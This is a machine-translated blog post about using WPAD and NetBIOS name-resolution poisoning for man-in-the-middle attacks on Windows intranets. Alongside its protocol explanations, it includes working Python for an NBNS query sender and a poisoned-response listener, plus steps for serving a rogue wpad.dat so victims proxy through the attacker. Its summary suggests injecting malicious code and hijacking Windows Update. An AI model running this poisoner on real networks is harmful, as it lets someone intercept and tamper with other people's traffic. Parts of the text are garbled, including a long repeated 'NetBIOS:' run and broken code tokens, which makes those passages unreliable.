Her0in 2016/01/08 9:55
0 x00 preface
WPAD technology has been developed for nearly 10 years. Its biggest advantage is that it can be flexibly configured for users on one or more lans to connect to the Internet or enterprise Intranet by setting different proxy servers. Because the proxy server configuration method is transparent to users and does not require manual operation, attackers can use WPAD to penetrate the Intranet.
WPAD has been used for Intranet penetration for many years, but it has not become as popular as ARP Spoof and other attack methods. This may be because in conventional Intranet penetration, such as Windows domain penetration, attackers only need to obtain the domain control permission to control any machine in the domain. Therefore, Attackers tend to focus only on catching the domain administrator’s HASH. Yet even in workgroup penetration, there are more effective ways to attack than WPAD. But before an attacker “qian” can “qian” “, will also use some “non-mainstream” ways to infiltrate the Intranet.
This article will elaborate the WPAD protocol’s working principle, the realization way and the application thought in the Intranet penetration, only plays a brick throwing function, hopes the big cow many “lead jade”.
PS: this article was written by the author in my spare time after work, it is inevitable that there will be mistakes, I also hope you see (DA) officer (NIU) in the comments section timely correct or PM me.
0 x01 WPAD profile
Web Proxy Auto-Discovery Protocol (WPAD) is short for Web Proxy automatic Discovery Protocol. This Protocol enables users’ browsers on the LAN to automatically discover Proxy servers on the Intranet and use the discovered Proxy servers to connect to the Internet or Intranet. WPAD supports all the major browsers and has supported automatic proxy discovery/switching since IE 5.0, but Apple is concerned about WPAD’s security risks. PAC file parsing is no longer supported by Safari browsers on operating systems including OSX 10.10 and later.
How WPAD works
When the automatic Proxy discovery function is enabled, the browser automatically searches for a Proxy server on the local LAN. If a Proxy server is found, the browser downloads a Proxy auto-config (PAC) configuration file from the Proxy server. This file defines the proxy server that a user should use when accessing a URL. The browser downloads and parses the file, and sets up the appropriate proxy server in the user’s browser.
The PAC file
The Proxy Auto-config (PAC) configuration file uses Javascript to describe the URL and Proxy server. While proxy.pac is usually used as the file name, the WPAD specification uses wpad.dat as the file name of the pac file.
A PAC file defines at least one JavaScript function called FindProxyForURL(URL, host), which returns a string specifying how the URL is accessed, The two parameters represent the URL to specify and the hostname to which the URL corresponds.
The following is an example of the PAC file content:
#! js function FindProxyForURL(url, host) { if (url== 'http://Her0in.org/') return 'DIRECT'; if (shExpMatch(host, "*.wooyun.org")) return "DIRECT"; If (host== 'wooyun.com') return 'SOCKS 127.1.1.1:8080'; If (dnsResolve(host) == '10.0.0.100') return 'PROXY 127.2.2.2:8080; DIRECT'; return 'DIRECT'; }Copy the code
This file defines that when a user accesses http://Her0in.org/, the URL will be accessed directly without using any proxy server. SOCKS 127.1.1.1:8080 SOCKS proxy 127.1.1.1:8080 is used for URL access. The PROXY 127.2.2.2:8080; DIRECT specifies that the HTTP proxy 127.2.2:8080 is used to access the URL. If the HTTP proxy server 127.2.2:8080 fails to be connected, the URL is accessed directly.
When setting up an HTTP proxy server for WPAD, you need to listen on port 80 because the client browser downloads PAC files from port 80 by default. Also set the MIME type of the PAC file to application/ X-Ns-proxy-autoconfig or application/ x-javascripts -config, though this is not mandatory.
PAC file coding issues
FF and IE only support PAC files of the system’s default encoding type, and do not support Unicode encoding, such as UTF-8. More information about PAC files can be found here and here.
0x02 WPAD in Windows
On Windows, WPAD has been supported since IE 5.0 and is enabled by default on Windows.
You can see that this function is selected by default in Internet Connection TAB LAN Settings Automatic Detection Settings of Internet Explorer.
As shown below:
Figure 1: WPAD Settings for Internet Explorer in Windows
In addition, Windows supports automatic proxy result caching starting from Internet Explorer 5.5, and this function is enabled by default. The mechanism of this function is that the ARP cache is updated every time the browser on the client successfully connects to the HTTP proxy server. Therefore, when the client browser connects to the proxy server again, that is, when the FindProxyForURL() function is called again, the client browser checks whether the ADDRESS of the HTTP proxy server to be connected exists in the ARP cache list. So the purpose of this feature is to reduce the overhead of the system getting allocated objects.
You can disable this function by:
Method 1: Modify the registry
Automatic proxy result caching can be disabled with the following registry key:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Will EnableAutoproxyResultCache (if not, please manually create, type of REG_DWORD) is set to 0 or 1.
0 = Cache disabled; 1 = Enable automatic proxy caching (default)
Method 2: Modify group policy Settings
In the Group Policy Object editor, choose User Configuration > Administrative Templates > Windows Components > Internet Explorer and enable Disable Caching Automatic proxy scripts.
WPAD support for WinHTTP
In Windows, there is a Service called WinHTTP Web Proxy Auto-Discovery Service. WinHTTP implements a client-side HTTP stack and provides developers with Win32 apis and COM automation components for sending HTTP requests and receiving responses. In addition, WinHTTP provides support for automatic discovery proxy server configuration by executing the Web Proxy Automatic Discovery (WPAD) protocol.”
PS: To be safe, it is recommended to disable it, as it will not be used in most cases.
0x03 WPAD Implementation mode
WPAD can be implemented in two ways: DHCP and DNS.
Configure the WPAD using the DHCP server
DHCP is short for Dynamic Host Configuration Protocol. It is a network Protocol for local area networks. It is at the OSI application layer and uses UDP as the transport Protocol. The main function of DHCP is dynamic allocation. Of course, not only IP addresses, but also other information, such as subnet masks and WPAD mentioned in this article, are set in the DHCP Options field.
The DHCP workflow consists of four steps:
Figure 2: DHCP workflow
The figure above shows the interaction between the client and the DHCP server. The first two processes send broadcast packets through the client, and then the DHCP server communicates with the client in unicast mode. The latter two processes are for the client to obtain an IP address from the DHCP server. If the client has successfully obtained the IP address and the IP address is not occupied by other hosts before the client logs in to the network again, the first two processes are not performed. DHCP protocol details are not the focus of this article.
The DHCP protocol is changed when WPAD is configured using a DHCP server. The changes can be seen in RFC 2131, which adds the DHCPINFORM message, which is used by clients to request local configuration parameters. Therefore, when the client requests the WPAD host, it sends a DHCPINFORM request message, and then the DHCP server replies with a DHCPACK acknowledgement message. The DHCP Options field in this message contains DHCP option 252, the PAC file address of the WPAD proxy server.
The DHCP structure of the DHCPACK packet that the DHCP server responds to is as follows:
Figure 3: DHCPACK message structure
For additional definitions of DHCP Options, see the DHCP RFC 1531 documentation
In most intranets, the DHCP server is no longer used to configure the WPAD on the client, but a relatively simple method such as the DNS server is used.
Configure WPAD using DNS
Using DNS to configure WPAD essentially exploits the name resolution mechanism of Windows.
The principles of configuring WPAD using DNS are as follows:
The client host sends a WPAD+X query request to the DNS server. If the client host is in a domain environment, the WPAD+X query request is WPAD. The current domain name. The DNS server resolves the WPAD host name and returns the IP address of the WPAD host. The client host downloads and resolves the PAC file through port 80 of the WPAD host IP.
To configure WPAD using DNS, the network administrator only needs to add the resolution record of the WPAD host to the DNS server.
PS: In the workgroup environment, when the client host performs the WPAD function, it will follow the Windows system name resolution order, the query name is “WPAD”, if the OS version is later than Vista (including Vista) in the order: DNS => LLMNR => NBNS; otherwise, DNS => NBNS.
0x04 Use WPAD to Infiltrate Intranet
The previous content has explained how WPAD works, how it is implemented, and related content of WPAD in Windows system. The following is the focus of this article, how to use WPAD for Intranet penetration.
As has been stated above, in actual penetration, in most cases, the Intranet does not use DHCP to configure WPAD, but uses DNS to configure WPAD, or the Intranet does not set WPAD itself, the name resolution sequence of The Windows system will be followed by default. Therefore, You can take advantage of the defects in the name resolution sequence of the Windows system to configure the WPAD “malicious” to infiltrate the Intranet.
Ideas about the order of name resolution in Windows and the penetration of Windows name resolution flaws can be found in my next two articles.
Exploration and Defects Utilization of Windows Name Resolution Mechanism (Hereinafter referred to as Text 1)
Hijacking Intranet designated host sessions using LLMNR name resolution defects (hereinafter referred to as text 2)
WPAD – based man-in-the-middle attack using NetBIOS name resolution
Article 2 has described how to use LLMNR name resolution to infiltrate Intranet, and gives the corresponding code. So this article will not go over “how to exploit the LLLMNR name resolution flaw for a WPAD based man-in-the-middle attack”.
NetBIOS protocol name resolution process
The NetBIOS name resolution process is shown in the following figure. The victim accesses the WEBSERVER on the LAN (no WEBSERVER exists in the NetBIOS cache of the victim host) :
Figure 4: NetBIOS name resolution process
NetBIOS protocol analysis
The Wireshark can be used to quickly capture data packets whose protocol names are queried by NetBIOS, as shown in the following figure:
Figure 5: NetBIOS name query packet format
The protocol structure of NetBIOS is the same as that of LLMNR. NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS: NetBIOS
PS: The following code is referenced from the DPKT library.
#! python def encode_name(name): """Return the NetBIOS first-level encoded name.""" l = [] for c in struct.pack('16s', name): c = ord(c) l.append(chr((c >> 4) + 0x41)) l.append(chr((c & 0xf) + 0x41)) return ''.join(l) def decode_name(nbname): """Return the NetBIOS first-level decoded nbname.""" if len(nbname) ! = 32: return nbname l = [] for i in range(0, 32, 2): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return ''.join(l).split('\x00', 1)[0]Copy the code
From the code is not difficult to analyze the decryption process, as for why pack use 16 please see article 1 on the NetBIOS name.
The NetBIOS protocol contains many contents, many of which are directly related to some commands used in Intranet penetration. For more information, you can refer to the NetBIOS RFC documents
NetBIOS protocol in Python
Although there are excellent open source network protocol library to implement NetBIOS challenge and reply, but in order to better understand NetBIOS protocol, we still start to construct our own protocol packet. NetBIOS name query packets can be quickly constructed and implemented based on the packets captured by Wireshark (Figure 5). The code is as follows:
#! python #/usr/bin/env python # -*- coding:utf-8 -*- __doc__ = """ NBNS Query , by Her0in """ import socket, struct class NBNS_Query: def __init__(self,name): self.name = name self.populate() def populate(self): Self. HOST = '192.168.16.255' self.PORT = 137 self. NQS = socket.socket(socket.af_inet, socket.SOCK_DGRAM) self.QueryData = ( "\xa9\xfb" # Transaction ID "\x01\x10" # Flags Query "\x00\x01" # Question:1 "\x00\x00" # Answer RRS "\x00\x00" # Authority RRS "\x00\x00" # Additional RRS "\x20" # length of Name:32 "NAME" # Name "\x00" # NameNull "\x00\x20" # Query Type:NB "\x00\x01") # Class self.data = self.QueryData.replace('NAME', struct.pack("32s", self.encode_name(self.name))) # From http://code.google.com/p/dpkt/ def encode_name(self,name): """Return the NetBIOS first-level encoded name.""" l = [] for c in struct.pack('16s', name): c = ord(c) l.append(chr((c >> 4) + 0x41)) l.append(chr((c & 0xf) + 0x41)) return ''.join(l) def Query(self): while 1: print "NBNS Querying... -> %s" % self.name self.nqs.sendto(self.data, (self.HOST, self.PORT)) self.nqs.close() if __name__ == "__main__": nbns = NBNS_Query("WPAD") nbns.Query()Copy the code
Using the Wireshark to capture NetBIOS name query packets, you can also quickly respond to NetBIOS name query packets. The code is as follows:
#! python #/usr/bin/env python # -*- coding:utf-8 -*- __doc__ = """ NBNS Answer , by Her0in """ import socket, struct,binascii class NBNS_Answer: def __init__(self, addr): self.IPADDR = addr self.nas = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.init_socket() self.populate() def populate(self): self.AnswerData = ( "TID" # Transaction ID "\x85\x00" # Flags Query "\x00\x00" # Question "\x00\x01" # Answer RRS "\x00\x00" # Authority RRS "\x00\x00" # Additional RRS "\x20" # length of Name:32 "NAME" # Name "\x00" # NameNull "\x00\x20" # Query Type:NB "\x00\x01" # Class "\x00\x00\x00\xa5" # TTL "\x00\x06" # "\x00\x00" # Null "IPADDR") # IP Address def init_socket(self): Self. HOST = "0.0.0.0" self.PORT = 137 self.nas. Setsockopt (socket.sol_socket, socket.so_reuseaddr, 1) self.nas.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) def decode_name(self, nbname): """Return the NetBIOS first-level decoded nbname.""" if len(nbname) ! = 32: return nbname l = [] for i in range(0, 32, 2): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return ''.join(l).split('\x00', 1)[0] def Answser(self): self.nas.bind((self.HOST, self.PORT)) print "Listening..." while 1: data, addr = self.nas.recvfrom(1024) tid = data[0:2] name = data[13:45] data = self.AnswerData.replace('TID', tid) data = data.replace('NAME', name) data = data.replace('IPADDR', socket.inet_aton(self.IPADDR)) print "Poisoned answer(%s) sent to %s for name %s " % (self.IPADDR, addr[0], self.decode_name(name)) self.nas.sendto(data, addr) self.nas.close() if __name__ == "__main__": NBNS = NBNS_Answer (" 11.22.33.44 ") NBNS. Answser ()Copy the code
NetBIOS name resolution is used to resolve the idea of man in the middle attack based on WPAD
It is not difficult to understand the idea of using NetBIOS name resolution for WPAD man-in-the-middle attack, but the idea of using NetBIOS name resolution will not be described as article 2. Because I think, as long as you understand the idea of attack, how to use is a “methodology” of the problem, specific situation specific analysis, you are free to play.
In essence, the WPAD man-in-the-middle attack based on NetBIOS name resolution takes advantage of the name resolution sequence of Windows system and the characteristics of NetBIOS protocol.
As mentioned in section 3 of this article, in a workgroup environment, when the client host performs the WPAD function, it follows the Windows name resolution order and queries the name as “WPAD.” So, it seems that, first broadcast to register the name “WPAD”, then listen to port 137, wait for other hosts in the LAN with WPAD function to start Internet Explorer to connect to the network, then set the browser proxy of the victim host to the proxy server specified by the attacker. You can get access to the victim’s browser.
Using the Demo program from the previous section and Python’s SimpleHTTPServer functionality and an HTTP or SOCKS proxy server, you can quickly simulate a simple attack scenario. The diagram below:
Figure 6: WPAD-based man-in-the-middle attack using NetBIOS name resolution
As shown in the figure above, the attacker starts the NetBIOS malicious reply program and listens for the download of the PAC configuration file (wpad.dat) provided by port 80. At the same time, the proxy server (HTTP proxy server is used here => Burp Suite) is started.
The victim host (Windows XP) opens the Internet Explorer (with WPAD function enabled) and starts to surf the Internet. At this time, the browser will search for the proxy server in the current LAN, actually querying the name of WPAD. As shown in the figure, the malicious reply program of the attacker responds maliciously. The HTTP server that also provides the PAC configuration file download prints the log message. At this point, the victim’s browser has downloaded the PAC configuration file (which contains the proxy server address information), and then the victim’s browser uses the proxy server designated by the attacker to access the Internet. You can see this in the Burp Suite.
OK, the above content is the idea and process of the whole attack. In actual combat, the attack process can be programmed and automated.
0 x05 summary
In fact, there are many ways to use NetBIOS protocol to carry out man-in-the-middle attack. The attack ideas can also be flexibly arranged according to actual needs. The WPAD attack probably won’t work as well as expected, but once it does, you’ll get access to the victim’s host. Especially in the case of there, it’s worth a try, many network, the administrator will not do defensive measures against these attacks way, in addition to the part of the desktop security products, such as firewalls may do strict filtering interception, in most cases, this kind of attack method is very effective, especially when can do it in the name resolution response, screening the victim host, Modify HTTP packets, insert malicious codes, and carry out targeted attacks. In addition, NetBIOS has an advantage over LLMNR in that NetBIOS name resolution responds to the domain name accessed by the victim only if the DNS server does not respond successfully. This, and WPAD, can be combined with the Update domain used by Windows Update for a man-in-the-middle attack to download and execute the attacker’s specified patch file.
NetBIOS protocol content can be consulted in the relevant RFC documents, there are a lot of things can be used in Intranet penetration, such as the value of the OPCODE field, BROWSER protocol and so on, more attack ideas are still to be seen by you.